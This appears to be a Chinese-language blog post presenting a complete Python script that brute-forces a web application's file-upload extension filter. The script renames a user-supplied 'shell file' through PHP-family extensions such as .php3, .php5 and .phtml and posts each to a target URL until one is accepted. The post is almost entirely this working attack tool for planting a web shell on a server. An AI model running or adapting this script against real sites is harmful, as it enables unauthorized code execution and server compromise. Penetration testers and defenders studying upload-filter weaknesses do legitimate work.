利用Python編寫測試可以繞過上傳副檔名限制的工具
阿新 • • 發佈:2022-05-20
1 import requests 2 import sys 3 import optparse 4 import os 5 6 7 class ExtensionTest: 8 def __init__(self) -> None: 9 self.url = self.get_params()[0] 10 self.filename = self.get_params()[1] 11 self.extension_list = ['.php', '.php2', '.php3', '.php4','.php5', '.phtml'] #Possible extension to try 12 13 14 def get_params(self): 15 parser = optparse.OptionParser("Usage: <Program> -u url -f shell file") 16 parser.add_option('-u', '--url', dest='url', type='string', help='Specify target url') 17 parser.add_option('-f', '--filename', dest='filename',type='string', help='Specify shell filename') 18 options, args = parser.parse_args() 19 if options.url is None or options.filename is None: 20 print(parser.usage) 21 sys.exit(0) 22 23 if not os.path.exists(options.filename): 24 print("The shell file does not exist") 25 sys.exit(0) 26 27 return options.url, options.filename 28 29 30 def file_upload(self, filename): 31 headers = { 32 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' 33 } 34 try: 35 with open(filename, 'rb') as f: 36 file_dict = {'file':f} #鍵名要與實際的form表單中的檔案部分一致,否則出現莫名其妙的錯誤,這個不是檔名 37 response = requests.post(self.url, files=file_dict) 38 39 return response.text 40 except: 41 return None 42 43 def run(self): 44 for ext in self.extension_list: 45 filename = self.filename.split('.')[0] + ext 46 print('[-] Try %s' %filename) 47 os.rename(self.filename, filename) 48 49 response = self.file_upload(filename) 50 51 if response: 52 if "Extension not allowed" in response: 53 print('%s not allowed' % ext) 54 os.rename(filename, self.filename) 55 else: 56 57 print("%s allowed" % ext) 58 sys.exit(0) 59 60 61 if __name__ == "__main__": 62 ext = ExtensionTest() 63 ext.run()